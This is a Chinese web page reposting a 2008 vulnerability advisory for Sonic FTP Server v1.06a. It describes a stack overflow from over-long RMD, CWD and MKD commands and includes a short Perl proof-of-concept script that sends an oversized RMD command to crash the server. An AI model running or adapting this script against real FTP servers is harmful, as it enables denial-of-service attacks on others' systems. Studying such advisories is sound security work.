天下网吧 >> 网吧天地 >> 网吧技术 >> 网吧安全 >> 正文

SonicFTPServer远程超长命令堆栈溢出

2008-2-18黑客基地佚名

  受影响系统:

  Sonic FTP Server v1.06a

  描述:

  Sonic FTP Server 是一款免费软件。

  Sonic FTP Server在处理包含超长字符串时多个命令存在问题,远程攻击者可以利用这个漏洞

  对FTP服务程序进行拒绝服务攻击。

  FTP服务程序对一些包含超长字符串的RMD、CWD、MKD命令缺少正确的边界缓冲区检查,可导致触

  发基于栈的溢出,精心构建提交数据,可能以服务进程权限执行任意指令。

  验证代码:

  use IO::socket::INET;

  $host = "192.168.1.71";
$port = 21;
$buffer = "A" x 506;

  $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port) || die
"[!] Unable to connect to $host\n";

  for($i = 1; $i < 10; $i++)
{
$socket->recv($recvbuf,200);
print $recvbuf;
}

  print $socket "USER 1\r\n";
$socket->recv($recvbuf,200);
print $recvbuf;

  print $socket "PASS 1\r\n";
for($i = 1; $i < 10; $i++)
{
$socket->recv($recvbuf,200);
print $recvbuf;
}

  print $socket "RMD $buffer\r\n";
$socket->recv($recvbuf,200);
print $recvbuf;

  close($socket);

欢迎访问最专业的网吧论坛,无盘论坛,网吧经营,网咖管理,网吧专业论坛https://bbs.txwb.com

关注天下网吧微信,了解网吧网咖经营管理,安装维护:


本文来源:黑客基地 作者:佚名

声明
本文来源地址:0
声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。若文章侵犯了您的相关权益,请及时与我们联系,我们会及时处理,感谢您对本站的支持!联系Email:support@txwb.com.,本站所有有注明来源为天下网吧或天下网吧论坛的原创作品,各位转载时请注明来源链接!
天下网吧·网吧天下
  • 本周热门
  • 本月热门
  • 阅读排行